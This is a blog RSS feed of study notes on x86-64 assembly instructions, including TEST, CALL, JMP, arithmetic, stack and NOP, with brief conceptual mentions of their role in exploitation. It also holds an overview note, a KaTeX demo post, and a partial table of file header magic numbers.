- In PWN, RBP can be forged to hijack the destination of the subsequent RET</content:encoded></item><item><title>TEST</title><link>https://goosequill.erina.top/en/blog/202511225125/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225125/</guid><description>Import notes for TEST</description><pubDate>Sat, 22 Nov 2025 11:51:00 GMT</pubDate><content:encoded>##  TEST (test)

### Basic function
The TEST instruction performs a bitwise AND on two operands, but **does not store the result; it only updates the flags**.  
It is commonly used for conditional checks, such as testing whether a register is 0 or whether a certain bit is set.
Logical behavior:
```
temp = op1 &amp; op2     ; 结果丢弃
更新 EFLAGS          ; 根据 temp 更新标志位
```
### Instruction execution process
- Perform bitwise AND
- Do not write back the result (discard it)
- Update ZF, SF, PF, CF, OF, AF, where:
    - CF = 0
    - OF = 0
    - ZF depends on whether the result is 0
    - SF is determined by the highest bit of the result
    - PF is updated according to even parity

### Instruction format
```
test r/m32, r32
test r/m64, r64
test r/m32, imm32
test r/m8,  imm8
```
### Behavioral characteristics
- It is the &quot;no-result version&quot; of logical AND
- Commonly used to test whether a certain bit is 1
- Does not modify operands (non-destructive)
- Especially suitable for branch checks and state analysis

Difference from AND:
- `and op1, op2` writes the result back to op1
- `test op1, op2` does not modify any operand at all; it only affects the flags

Equivalent behavior example (logically equivalent):
```
and temp, op1, op2     ; 假设 temp 是一个不存在的寄存器
根据 temp 更新 EFLAGS
; temp 被丢弃
```
### Common uses
- Test whether a register is 0:
```
    test eax, eax     ; 等价于检查 eax 是否为 0
    jz   is_zero
```
- Check whether a certain bit is set:
    ```
    test rax, 0x100
    jnz  bit_set
    ```
- Test whether a pointer is null or whether a flag bit is valid
- Protocol parsing (bitwise decomposition of flag fields)
- In reverse engineering analysis, it often appears in permission checks or state branches
- In PWN debugging, it is often used to understand whether validation logic has been bypassed

### Small example: test whether eax is even
```
test eax, 1
jz   even
```
Principle: lowest bit is 0 → even number.

---</content:encoded></item><item><title>CALL</title><link>https://goosequill.erina.top/en/blog/202511224434/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511224434/</guid><description>Import notes on CALL</description><pubDate>Sat, 22 Nov 2025 11:44:00 GMT</pubDate><content:encoded>##  CALL (call)

### Basic purpose
CALL is used to invoke a function by jumping to the target location to execute code while saving the return address so execution can return to the call site when the function finishes.
### Instruction execution process
1. Push the address of the instruction following the current instruction (the return address) onto the stack

2. Set RIP to the call target address

3. Begin executing the new code path

Equivalent behavior (x64):
```
push rip_next
jmp target
```
### Instruction formats

```

call rel32 ; 相对调用（最常见）

call rax ; 寄存器间接调用

call [rax] ; 内存间接调用

call qword ptr [...] ; 绝对调用

```

### Behavioral characteristics

- Modifies RSP (pushes the return address)

- Modifies RIP (jumps)

- Does not modify EFLAGS

- Changes to the stack structure have a major impact on PWN

- An important node for constructing ROP chains and hijacking control flow

  

### Common uses

- Calling functions

- Dynamically resolving function addresses (via the call/pop technique)

- Control-flow obfuscation (using call to enter an intermediate stub)

- Changing the return address during overflow exploitation</content:encoded></item><item><title>JMP</title><link>https://goosequill.erina.top/en/blog/202511223708/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223708/</guid><description>Import notes for JMP</description><pubDate>Sat, 22 Nov 2025 11:37:00 GMT</pubDate><content:encoded>## JMP (jmp)

### Basic function
JMP &lt;mark&gt;unconditionally jumps to the specified address&lt;/mark&gt; (immediate value, register, or memory address).  
It changes the direction of RIP and is one of the most fundamental control-flow instructions.
### Instruction execution process
- Write the target address into RIP
- Unconditionally transfer execution to the new location
- Does not modify EFLAGS

### Instruction format
```
jmp rel32          ; 相对跳转
jmp rax            ; 寄存器间接跳转
jmp [rax]          ; 内存间接跳转
jmp qword ptr [...] ; 绝对跳转
```
### Behavioral characteristics
- Does not return
- Does not affect registers (except &lt;mark&gt;RIP--&gt;instruction register&lt;/mark&gt;)
- Used for control-flow transfer and tail-call optimization
- **Heavily used in PWN** for:
    - Hijacking control flow (`ret2text` / `ret2csu` / `ret2shellcode`)
    - Jumps in ROP gadgets
    - Overwriting function pointers for exploitation

### Common uses
- Implementing loops and branches
- Jump tables and state machines
- Hooking/patching control flow
- ROP chain construction
- Exploiting stack overflows to hijack execution flow into shellcode
---</content:encoded></item><item><title>SHR</title><link>https://goosequill.erina.top/en/blog/202511223622/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223622/</guid><description>Import notes for SHR</description><pubDate>Sat, 22 Nov 2025 11:36:00 GMT</pubDate><content:encoded>##  SHR（shr）

### Basic purpose
SHR (logical right shift) shifts the operand right by n bits, filling the left side with 0s.  
Mathematically: `dest = floor(dest / 2^n)`。
### Instruction execution process
- Shift right the specified number of times
- Fill the left side with 0s
- Update CF, ZF, SF, OF
- The last shifted-out bit → CF

### Instruction format
```
shr r/m32, imm8
shr r/m64, imm8
shr r/m32, cl
shr r/m64, cl
```
### Behavioral characteristics
- Does not preserve the sign → not suitable for signed division
- Commonly used for unsigned integers
- Clearly different from SAR (SAR preserves the sign in the highest bit)

### Common uses
- Fast division by 2^n (unsigned)
- Bitmask cleanup
- Right-shifting fields in protocol parsing
- Patch points in certain encryption/encoding algorithms
---</content:encoded></item><item><title>SHL</title><link>https://goosequill.erina.top/en/blog/202511223500/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223500/</guid><description>Import notes for SHL</description><pubDate>Sat, 22 Nov 2025 11:35:00 GMT</pubDate><content:encoded>##  SHL (shl)

### Basic function
SHL (Shift Logical Left) shifts the destination operand left by n bits, filling the right side with 0s.  
In *mathematical terms*, it is equivalent to: `dest = dest * 2^n`。
### Instruction execution process
- Shift left the specified number of times
- Fill the right side with 0s
- Update flags such as CF, ZF, SF, and OF
- The last bit shifted out → CF

### Instruction format
```
shl r/m32, imm8
shl r/m64, imm8
shl r/m32, cl
shl r/m64, cl
```
### Behavioral characteristics
- Logical operation; does not consider the sign
- Performs fast multiplication on values
- Has a strong effect on flags, especially CF and OF

### Common uses
- Quickly multiply by 2^n
- Address calculation (such as structure base address offsets)
- Bitmap construction
- In ROP/shellcode, &lt;mark&gt;construct large numbers&lt;/mark&gt;

---</content:encoded></item><item><title>NOT</title><link>https://goosequill.erina.top/en/blog/202511223359/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511223359/</guid><description>Import notes for NOT</description><pubDate>Sat, 22 Nov 2025 11:33:00 GMT</pubDate><content:encoded>##  NOT (not)

### Basic function
NOT performs a bitwise inversion on the operand: `dest = ~dest`.  
That is, all bits 0 → 1, and 1 → 0.
### Instruction execution process
- Invert each bit
- Write the result back to the destination operand
- Does **not affect** any EFLAGS

### Instruction format
```
not r/m8
not r/m16
not r/m32
not r/m64
```
### Behavioral characteristics
- Single-operand instruction
- Does not modify flags
- Can be used to construct values, encryption, and mask processing

### Common uses
- Constructing special immediates (with XOR, ADD, etc.)
- Implementing two&apos;s complement relationships in logical operations
- Reversing all bits for verification and algorithm analysis
- Avoiding the direct appearance of certain bytes in shellcode

---</content:encoded></item><item><title>XOR</title><link>https://goosequill.erina.top/en/blog/202511222527/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222527/</guid><description>Import notes for XOR</description><pubDate>Sat, 22 Nov 2025 07:25:00 GMT</pubDate><content:encoded>##  XOR（xor）

### Basic Function
The XOR instruction performs a bitwise exclusive OR on two operands: `dest = dest XOR src`。  
If the corresponding bits are the same, the result is 0; if they are different, the result is 1.  
After execution, EFLAGS is updated.
### Instruction Execution Process
- Compute the XOR result
- Write the result back to the destination operand
- Update flags such as ZF, SF, and PF
- CF and OF are cleared to 0

### Instruction Format
```
xor r/m32, r32
xor r/m64, r64
xor r/m32, imm32
xor r/m64, imm32
```
### Behavioral Characteristics

- XOR REG, REG → &lt;mark&gt;clears the register to zero (a classic fast zeroing method)&lt;/mark&gt;
- Does not produce a carry
- Commonly used in &lt;mark&gt;encryption/obfuscation logic&lt;/mark&gt; --&gt;rc4 encryption
- Fast and compact in encoding; one of the most common bitwise operations

### Common Uses
- Clear a register: `xor eax, eax`
- Construct specific register values
- Obfuscation algorithms, encoders, and decryptors
- Used in shellcode to avoid badchars

---</content:encoded></item><item><title>OR</title><link>https://goosequill.erina.top/en/blog/202511222320/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222320/</guid><description>Import notes for OR</description><pubDate>Sat, 22 Nov 2025 07:23:00 GMT</pubDate><content:encoded>##  OR (or)

### Basic function
OR performs a bitwise logical OR operation:
```
x1 = x1 | x2
```
### Instruction format
```
or x1, x2
```
The same constraints as AND apply:
- x1 can be a register or memory
- x2 can be a register or an immediate value
- Memory-to-memory is not allowed
### Behavioral characteristics
- Used to set specific bits
- CF and OF are cleared
- If the result is 0 → ZF = 1, otherwise ZF = 0
### Examples
```
or eax, 1
; 设置最低位

or rax, rbx
or [rbp-8], 0x80
```
### Common uses
- Set flags or masks
- Merge flags
- Construct specific bitmaps

---</content:encoded></item><item><title>AND</title><link>https://goosequill.erina.top/en/blog/202511222215/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222215/</guid><description>Import notes for AND</description><pubDate>Sat, 22 Nov 2025 07:22:00 GMT</pubDate><content:encoded>##  AND (and)

### Basic function
AND performs a bitwise logical AND operation:
```
x1 = x1 &amp; x2
```
### Instruction format
```
and x1, x2
```
`x1` can be a register or memory  
`x2` is a register or an immediate value  
but memory-to-memory is not allowed
### Behavioral characteristics
- Commonly used for bit clearing
- ZF is set if the result is all zeros
- OF and CF are cleared
- It does not produce a carry concept, because it is a logical operation
### Example
```
and eax, 0xFF
; 保留低 8 位

and rax, rbx
and [rbp-0x8], 0x1
```
### Common uses
- Masking operations --&gt; IP&amp;24 subnet mask
- Bit condition checking
- Alignment calculations (such as aligning an address to 4, 8, or 16 bytes)

For example, aligning to 16 bytes:

```
and rsp, -0x10
```

---</content:encoded></item><item><title>IDIV-DIV</title><link>https://goosequill.erina.top/en/blog/202511222126/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222126/</guid><description>Import notes for IDIV-DIV</description><pubDate>Sat, 22 Nov 2025 07:21:00 GMT</pubDate><content:encoded>##  IDIV-DIV (idiv / div)

### Basic purpose
IDIV → signed division
DIV → unsigned division  
Result layout:
- Quotient → eax
- Remainder → edx

(or rax / rdx)

##### IDIV (signed) format
```
idiv r/m32
; edx:eax ÷ r/m32
; 有符号除法
```
Before execution:
- Fill EDX with the sign extension of EAX (`cdq` instruction)
### DIV instruction format (unsigned)

```
div r/m8
; ax  ÷ r/m8
; al = 商
; ah = 余数

div r/m32
; edx:eax ÷ r/m32
; eax = 商
; edx = 余数
```
Note: before execution, `edx` must be cleared to zero (if the dividend is an unsigned dword).
### Behavioral characteristics
- Divisor is 0 → divide-by-zero exception
- Quotient or remainder out of range → overflow exception
- Implicitly uses registers (AL/AX/EAX/RAX and AH/EDX/RDX)
    

### Examples
```
mov eax, 100
mov ecx, 7
xor edx, edx
div ecx
; eax = 14, edx = 2
```
Signed:
```
mov eax, -30
mov ecx, 4
cdq
idiv ecx
; eax = -7, edx = -2
```</content:encoded></item><item><title>IMUL-MUL</title><link>https://goosequill.erina.top/en/blog/202511222013/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511222013/</guid><description>Import notes for IMUL-MUL</description><pubDate>Sat, 22 Nov 2025 07:20:00 GMT</pubDate><content:encoded>##  IMUL-MUL (imul / mul)

### Basic purpose
IMUL → signed multiplication  
MUL → unsigned multiplication
Both may involve a double-register result (EDX:EAX or RDX:RAX).

### IMUL instruction formats
There are three forms:
1. Implicit form (result stored in edx:eax)

```
imul r/m32
; EDX:EAX = EAX * r/m32（有符号）
```
2. Explicit two-operand form

```
imul reg, r/m32
reg = reg * r/m32
```

3. Three-operand form
    

```
imul reg, r/m32, imm
reg = r/m32 * imm
```

---

### MUL instruction format (unsigned)
```
mul r/m32      ; EDX:EAX = EAX * r/m32
```

MUL does not have an explicit `reg = reg × x` form.

### Behavioral characteristics
- The high part of the result (EDX or RDX) is used to determine overflow
- If the high part is not 0, OF = CF = 1
- The implicit form must use the accumulator register (EAX / RAX) as an operand
### Example
```
mov eax, 5
imul eax, 3      ; eax = 15

mov eax, -10
imul eax, -4     ; eax = 40（有符号乘法）
```

Implicit form:
```
mov eax, 0x10000
imul dword ptr [rbp-4]  ; rdx:rax = rax * [rbp-4]
```
### Common uses
- Mathematical calculations
- Array index calculation (`index × element_size`)
- Struct offset calculation

---</content:encoded></item><item><title>SUB</title><link>https://goosequill.erina.top/en/blog/202511221913/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221913/</guid><description>Import notes for SUB</description><pubDate>Sat, 22 Nov 2025 07:19:00 GMT</pubDate><content:encoded>##  SUB (sub)

### Basic function
The `SUB` instruction performs subtraction, writing the result of `x1 - x2` back to `x1`.
### Instruction format
```
sub x1, x2
x1 = x1 - x2
```
`x1` and `x2` can be:
- Register
- Memory
- Immediate value

Restrictions:
- &lt;mark&gt; They cannot both be memory operands at the same time&lt;/mark&gt;

### Instruction execution process
```
x1 ← x1 - x2
EFLAGS ← 根据结果更新
```
Affected flags:
- OF (signed overflow)
- SF (sign)
- ZF (whether the result is 0)
- CF (used to determine whether a borrow occurred)
- AF, PF

### Example
```
sub eax, ebx
sub rax, 0x100
sub [rbp-0x4], 1
```
### Equivalent expansion
```
sub rax, rbx
; 等价于
tmp = rax - rbx
rax = tmp
更新 EFLAGS
```
### Common uses
- Decrementing, loop counting
- Moving the stack pointer upward (such as the reverse of a `sub` operation)
- Numeric computation
- Address offsetting (such as moving backward within a structure)

---</content:encoded></item><item><title>ADD</title><link>https://goosequill.erina.top/en/blog/202511221655/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221655/</guid><description>Import notes for ADD</description><pubDate>Sat, 22 Nov 2025 07:16:00 GMT</pubDate><content:encoded>## ADD (add)

### Basic function
The `ADD` instruction performs addition, writing the result of x1 + x2 into x1.  
At the same time, &lt;mark&gt;it affects multiple EFLAGS flags&lt;/mark&gt;.
### Instruction format
```
add x1, x2
x1 = x1 + x2
```
x1, x2 types:
- Register
- Memory
- Immediate value  
  (the two cannot both be memory)

### Instruction execution process
```
x1 ← x1 + x2
EFLAGS ← 根据结果更新
```
The affected flags include:
- OF (overflow)
- SF (sign)
- ZF (zero)
- CF (carry)
- AF, PF

### Example
```
add eax, ebx      ;寄存器 寄存器
add rax, 0x20.    ;寄存器 立即数
add [rbp-0x4], 1  ; 内存 立即数
```

### Equivalent expansion example
```
add rax, rbx
; 等价于
tmp = rax + rbx
rax = tmp
更新 EFLAGS
```
### Common uses
- Pointer offset
- Incrementing, accumulation
- Integer arithmetic
- Constructing loop counters
- Stack address calculation (such as `add rsp, 0x20`)
    

---</content:encoded></item><item><title>LEA</title><link>https://goosequill.erina.top/en/blog/202511221611/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221611/</guid><description>Import notes for LEA</description><pubDate>Sat, 22 Nov 2025 07:16:00 GMT</pubDate><content:encoded>##  LEA (lea)

### Basic purpose
LEA (Load Effective Address) is used to compute and load the value of an &quot;effective address expression&quot; rather than access that memory address.  
It is essentially an arithmetic instruction, not a memory read instruction.
### Instruction format
```
lea rX, [address_expression]
rX = 计算 [ ] 内的表达式
```
### Behavioral characteristics
- Does not access memory; only computes addresses
- Commonly used for pointer arithmetic
- Can replace addition and multiplication (commonly used by compilers)
- Can implement the full expression: base + index × scale + displacement

### Examples
```
lea rbx, [rdx + rax*4 + 0x10]
; 等效于：
rbx = rdx + rax*4 + 0x10
```
### Common uses
- Pointer offset calculation
- Struct field offset calculation
- Fast addition/multiplication replacement (e.g. `lea rax, \[rax+rax_2\] = rax_3`)
- Widely used in compiler optimizations to reduce arithmetic instructions
    

---</content:encoded></item><item><title>MOV</title><link>https://goosequill.erina.top/en/blog/202511221504/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221504/</guid><description>Import notes for MOV</description><pubDate>Sat, 22 Nov 2025 07:15:00 GMT</pubDate><content:encoded>## MOV

## MOV (mov)
### Basic purpose
The MOV instruction is used to copy the value of the source operand to the destination operand.  
This is one of the most commonly used instructions for data transfer.
### Instruction format
```
mov dst, src
dst = src
```
Allowed:
- Register ← Register
- Register ← Memory
- Memory ← Register
- Register ← Immediate
- Memory ← Immediate
Forbidden:
- Memory ← Memory
    

### Behavioral characteristics
- Different alignment and size selections may trigger automatic extension (such as movzx, movsx)
- Does not modify &lt;mark&gt;EFLAGS&lt;/mark&gt; (important)
- Can perform zero extension (`mov r32` → automatically clears the upper 32 bits)
    

Example:
```
mov eax, [rbp-0x10]
mov [rbp-0x8], rax
mov ecx, 0x1234
```
### Equivalent analysis
MOV is a pure data copy operation and can be regarded as:
```
dst = src
```
Understanding MOV is very helpful for mastering function argument passing and register behavior under the ABI.
### Common uses
- Passing variables
- Initializing registers
- Changing pointer positions
- Saving and restoring values

---</content:encoded></item><item><title>POP</title><link>https://goosequill.erina.top/en/blog/202511221401/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221401/</guid><description>Notes on importing POP</description><pubDate>Sat, 22 Nov 2025 07:14:00 GMT</pubDate><content:encoded>## POP（pop）

### Basic Function
The POP instruction pops the top value from the stack into the destination operand, then moves the stack pointer upward.  
In contrast to PUSH, POP increases ESP/RSP.
### Instruction Execution Process
64-bit:
```
操作数 = [rsp]
rsp = rsp + 8
```
32-bit:
```
操作数 = [esp]
esp = esp + 4
```
### Instruction Format
The following operands are allowed:
- pop r/m16
- pop r/m32
- pop r/m64

Not allowed:
- pop memory to memory
- pop immediate

### Behavioral Characteristics
- The stack pointer moves upward
- The original stack data is not cleared; it only becomes logically invalid
- POP cannot directly pop an immediate value
- The destination register size must match when popping into a register (`pop rax` → 8 bytes)

### Equivalent Expansion Example
```
pop rax
; 等价于
mov rax, [rsp]
add rsp, 8
```
### ASCII Stack Diagram
Before execution:
```
rsp → +------------------+
      |   要弹出的值       |
      +------------------+
```
After executing pop rax:
```
rsp → +------------------+
      |   （旧数据）       |
      +------------------+
;       rax = 原栈顶值
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202511221514486.png)
⚠️ Note: the stack data at `0x0012FF88` here will not be cleared, but it will be overwritten during normal program execution
### Common Uses
- Restore saved registers
- Restore stack state before a function returns
- Move the top of the stack to skip data
- Used in PWN for stack pivoting or stack adjustment

---</content:encoded></item><item><title>PUSH</title><link>https://goosequill.erina.top/en/blog/202511220928/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511220928/</guid><description>Import notes for PUSH</description><pubDate>Sat, 22 Nov 2025 07:09:00 GMT</pubDate><content:encoded>##  PUSH (push)

### Basic purpose
The `PUSH` instruction pushes an operand onto the stack and updates the stack pointer.  
In x86/x64, the stack grows toward lower addresses, so `PUSH` decreases the value of `ESP`/`RSP` first, then writes the data to the new top of the stack.
### Instruction execution process
Using 64-bit as an example:
```
rsp = rsp - 8
[rsp] = 操作数
```
For 32-bit:
```
esp = esp - 4
[esp] = 操作数
```
### Instruction format
The following operands are allowed:
- push r/m16
- push r/m32
- push r/m64
- push imm8 / imm16 / imm32 (in x64, it is sign-extended to 64 bits)

The sign extension of immediate pushes is a unique behavior of `PUSH`.
### Behavioral characteristics
- The stack pointer moves downward
- Writing a value does not clear old memory; it only overwrites it
- Immediate values are sign-extended (`push imm32` → 64bit)
- Operands cannot be two memory addresses
- The stack layout changes, affecting function call offset calculations

### Equivalent expansion example
```
push rax
; 等价于
sub rsp, 8
mov [rsp], rax
```

```
push 0x1234
sub rsp, 8
mov qword ptr [rsp], 0x0000000000001234
```
### ASCII stack change illustration
Before execution:
```
rsp → +------------------+
      |   （旧栈数据）    |
      +------------------+
```

After executing `push rax`:
```
      +------------------+
rsp → |     rax 的值      |
      +------------------+
      |   （旧栈数据）    |
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202511221512956.png)
### Common uses
- Save register contents
- Push arguments during function calls
- Align stack space
- Temporarily save data
- In PWN, used to control stack layout and overwrite return addresses

---</content:encoded></item><item><title>NOP</title><link>https://goosequill.erina.top/en/blog/202511225944/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225944/</guid><description>Import notes on NOP</description><pubDate>Sat, 22 Nov 2025 06:59:00 GMT</pubDate><content:encoded>##  NOP (nop)

### Basic function
The NOP (No Operation) instruction represents a null operation, meaning that after executing this instruction, the processor does not modify any registers, does not access memory, does not change EFLAGS, and does not affect the program&apos;s logical flow.
Its only effect is to consume one CPU instruction cycle, allowing the program to continue executing the next instruction sequentially.
### Instruction execution process
The internal behavior of NOP can be understood as:
```
; 执行后 CPU 状态不变
```
At the microarchitectural level, it is typically implemented as a special marker used for instruction pipeline filling or alignment, and does not produce any actual read or write operations.
### Instruction format
The NOP instruction has only one form:
```
nop
```
However, in assemblers, multi-byte NOPs can also be used for instruction alignment, for example:
```
nop
nop DWORD ptr [rax+rax]
```
These multi-byte NOPs generated by the compiler serve the same purpose: filling space and aligning addresses.
### Behavioral characteristics
- Does not modify register contents

- Does not access memory

- Does not change EFLAGS

- Does not affect control flow

- Can be used for debugging, patch modification, and filling instruction alignment

- Multi-byte NOPs are commonly used for performance optimization (such as aligning loop bodies to 16-byte boundaries)

##### Equivalent instruction analysis
From a logical perspective, the effect of NOP is equivalent to:
```
mov eax, eax
```
That is, performing a self-assignment on a register, but a real NOP does not actually read or write any register, so it is more lightweight.

Assembly optimizers may also simulate NOP with other pseudo-instructions that never change state, for example:
```
lea rax, [rax]
```
However, none of these alternative forms is as pure as the native `nop`.
### Common uses
- Machine code patching: reserve byte space for future instructions

- Debugging: replace a dangerous instruction so the program can continue running

- Code alignment: improve CPU instruction prefetch and branch prediction performance

- Fixing jump offsets: fill gaps with NOPs

- When constructing shellcode, used as a NOP sled (to slide into the payload)

  

---</content:encoded></item><item><title>Assembly Instructions</title><link>https://goosequill.erina.top/en/blog/202511055717/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511055717/</guid><description>Import notes for Assembly Instructions</description><pubDate>Wed, 05 Nov 2025 12:57:00 GMT</pubDate><content:encoded># Assembly Instruction Overview
## Before You Begin
This note serves as the entry point to the entire assembly instruction system, helping build the reader’s overall perspective. There are many assembly language instructions, and without a reasonable structure, they can feel fragmented and difficult to understand.  
To address this, this note organizes all instructions in a layered way:

Level 1 (this document): explains the classification logic, global framework, and learning strategy.  
Level 2: divides instruction categories by function.  
Level 3: each instruction has its own dedicated note, including semantics, behavior, affected registers, common pitfalls, and PWN-related considerations.

All details of specific instructions belong to Level 3 and are not expanded on in this note.

## Explanation of the Classification Logic

Although the x86_64 instruction set is large, the parts that are truly common in reverse engineering and PWN can naturally be divided into several functional modules.  
These modules are not rigid knowledge categories, but are divided from the perspective of &quot;program behavior logic&quot;:

Arithmetic operations — modify data  
Data transfer — move data between registers and memory  
Stack and calls — function call chains and stack frame changes  
Control flow — how program execution changes direction  
Logic and bit operations — structural processing of data  
System interface — related to system calls (optional)

These modules form a complete closed loop of program behavior:  
Where data comes from, how it is processed, how it is pushed onto the stack, how execution jumps, and how it returns.

The Level 2 notes will be organized around these categories.

## Level 2 Category Description (for downstream branch structure)

Below is the recommended functional classification, which will become your Obsidian Level 2 branches:
[[运算与逻辑类]]
Processes data content, including arithmetic and logical operations.  
Common scenarios: decryption, length calculation, and loop counter operation.
[[数据传输类]]
Moves data between registers / memory / stack.  
This is the foundational path for understanding any assembly.
[[栈与调用类]]

The setup and teardown of the function call stack, one of the most sensitive groups of instructions in PWN.  
Involves push, pop, call, leave, ret, etc.
[[控制流与分支类]]

The decision points that determine the flow of program logic, including unconditional jumps and conditional jumps.  
In particular, this includes the broad jcc category.
[[位操作与移位类]]

Handles bit-level structures, such as encryption, hash, checksums, pointer arithmetic, etc.

String and block operations (optional)
Such as rep, movs, stos, etc. They do not appear frequently in reverse engineering, but understanding them is highly valuable.

System call related (optional)

Such as syscall, int80. Directly relevant to PWN.

These will each become the main category nodes of the Level 2 notes.

## Overview Table (without backlinks)

The following is the overall structure of your entire instruction library. It does not include links and is only intended to help readers form a complete picture:

Arithmetic and logic

- add
    
- sub
    
- inc
    
- dec
    
- xor
    
- not
    
- and
    
- or
    

Data transfer

- mov
    
- lea
    
- push
    
- pop
    

Stack and calls

- call
    
- ret
    
- leave
    

Control flow

- jmp
    
- jcc series (je, jne, ja, jb, jge, jle, etc.)
    

Shift and bit operations

- shl
    
- shr
    
- rol
    
- ror
    

Other

- nop
    
- special instructions (such as syscall, etc.)
    

## Usage Guide

To make this knowledge base more like an ever-expanding &quot;reverse engineering dictionary,&quot; the following usage method is recommended:

Encounter assembly → quickly locate by category → look up the corresponding Level 3 instruction  
At the same time, by tracing back through the categories, you can understand &quot;why this instruction appears here&quot; and &quot;what its relationship is.&quot;

The role of this note is to provide guidance and structure, rather than to collect details.  
All your instruction notes have already been written, so you only need to create empty documents or directories at the Level 2 branches according to this structure.</content:encoded></item><item><title>KaTeX Math Demo</title><link>https://goosequill.erina.top/en/blog/katex-demo/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/katex-demo/</guid><description>A sample post for verifying KaTeX support in this Astro blog theme.</description><pubDate>Tue, 16 Sep 2025 16:00:00 GMT</pubDate><content:encoded>This post is a quick demo to verify that KaTeX rendering works correctly.

## Inline math

Einstein&apos;s mass-energy equivalence: $E = mc^2$.

For $a \ne 0$, the quadratic equation $ax^2 + bx + c = 0$ has solutions $x = \frac{-b \pm \sqrt{b^2 - 4ac}}{2a}$.

## Display math

The Gaussian summation formula:

$$
\sum_{i=1}^{n} i = \frac{n(n+1)}{2}
$$

Euler&apos;s identity:

$$
e^{i\pi} + 1 = 0
$$

## Matrix

$$
A =
\begin{bmatrix}
1 &amp; 2 &amp; 3 \\
4 &amp; 5 &amp; 6 \\
7 &amp; 8 &amp; 9
\end{bmatrix}
$$

## Piecewise function

$$
f(x) =
\begin{cases}
x^2, &amp; x \ge 0 \\
-x, &amp; x &lt; 0
\end{cases}
$$

## Integral and limit

$$
\int_0^1 x^2\,dx = \frac{1}{3}
$$

$$
\lim_{x \to 0} \frac{\sin x}{x} = 1
$$</content:encoded></item><item><title>Hex Values of Common File Headers</title><link>https://goosequill.erina.top/en/blog/20250916135048/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/20250916135048/</guid><description>Imported note on the hex values of common file headers</description><pubDate>Tue, 16 Sep 2025 05:50:00 GMT</pubDate><content:encoded>##  Hex Values of Common File Headers

Below I will provide you with a detailed, professional, and practical guide to common file header identifiers (Magic Numbers).

### 1. What is a file header identifier (Magic Number)?

1. **Definition**: A file header identifier is a series of specific bytes located at the beginning of a file, usually represented in hexadecimal. It is like a “digital fingerprint” or “signature” used to uniquely identify the file’s type and format.
    
2. **Purpose**:
    
    - **Tells the operating system how to properly handle a file**: When you double-click a file, the system reads its header rather than its extension to decide which program should open it.
        
    - **Digital forensics and data recovery**: When a file system is damaged, files are deleted, or extensions are maliciously altered, scanning the raw disk data (hex values) for file headers is a primary method for recovery and identification.
        
    - **Malware analysis**: When analyzing a suspicious file, the first step is often to inspect its header to determine its true type. For example, a file that appears to be `.jpg` may actually be an `.exe` executable.
        
    - **Cybersecurity**: WAFs (Web Application Firewalls) and intrusion detection systems (IDS) can inspect file headers to filter illegal file uploads and prevent attacks such as Webshells.
        
3. **Important note**: **File extensions (such as .txt, .exe, .jpg) can be changed arbitrarily and do not represent the file’s true type. File headers, however, are inside the file, and changing them usually corrupts the file, making them much more reliable.**
    

---

### 2. Detailed explanation of common file type headers

Below is a categorized table containing the most common and most important file types. **Offsets are usually counted from the beginning of the file (0x0)**.

#### 1. Image Formats

| File Format            | Common Extensions             | File Header (Hex)                                  | File Footer (Hex) | Notes                                                            |
| --------------- | ----------------- | :------------------------------------------ | :--------- | :------------------------------------------------------------ |
|  **JPEG/JFIF**  |  `.jpg`, `.jpeg`  |  `FF D8 FF E0`                              |  `FF D9`   | The most common image format. The opening `FF D8` indicates the start of a JPEG, and `FF E0` identifies the JFIF application segment.           |
|  **JPEG/Exif**  |  `.jpg`, `.jpeg`  |  `FF D8 FF E1`                              |  `FF D9`   | Created by digital cameras; `FF E1` indicates the Exif application segment.                                   |
|  **PNG**        |  `.png`           |  **`89 50 4E 47 0D 0A 1A 0A`**              | -          |  `50 4E 47` is the ASCII code for the letters &quot;PNG&quot;, making it very easy to recognize.                         |
|  **GIF**        |  `.gif`           |  **`47 49 46 38`**                          |  `00 3B`   |  `47 49 46 38` is the opening part of &quot;GIF89a&quot; or &quot;GIF87a&quot;.                   |
|  **BMP**        |  `.bmp`           |  **`42 4D`**                                | -          |  `42 4D` is the ASCII code for the letters &quot;BM&quot;.                                    |
|  **WEBP**       |  `.webp`          |  **`52 49 46 46 ?? ?? ?? ?? 57 45 42 50`**  | -          |  `52 49 46 46` is &quot;RIFF&quot;, and `57 45 42 50` is &quot;WEBP&quot;. `??` represents the file size field. |
|  **TIFF**       |  `.tif`, `.tiff`  |  `49 49 2A 00` (little-endian) or `4D 4D 00 2A` (big-endian)    | -          | There are two byte orders, so the opening identifiers differ as well.                                               |

#### 2. Archive Formats

| File Format       | Common Extensions    | File Header (Hex)                            | File Footer (Hex) | Notes                                                                                                        |     |
| ---------- | -------- | :------------------------------------ | :--------- | :-------------------------------------------------------------------------------------------------------- | --- |
|  **ZIP**   |  `.zip`  |  **`50 4B 03 04`**                    | -          |  `50 4B` is the ASCII code for the letters &quot;PK&quot; (from founder Phil Katz). **This is also the file header for `.docx`, `.xlsx`, `.pptx` and other Office documents**, because they are essentially ZIP archives. |     |
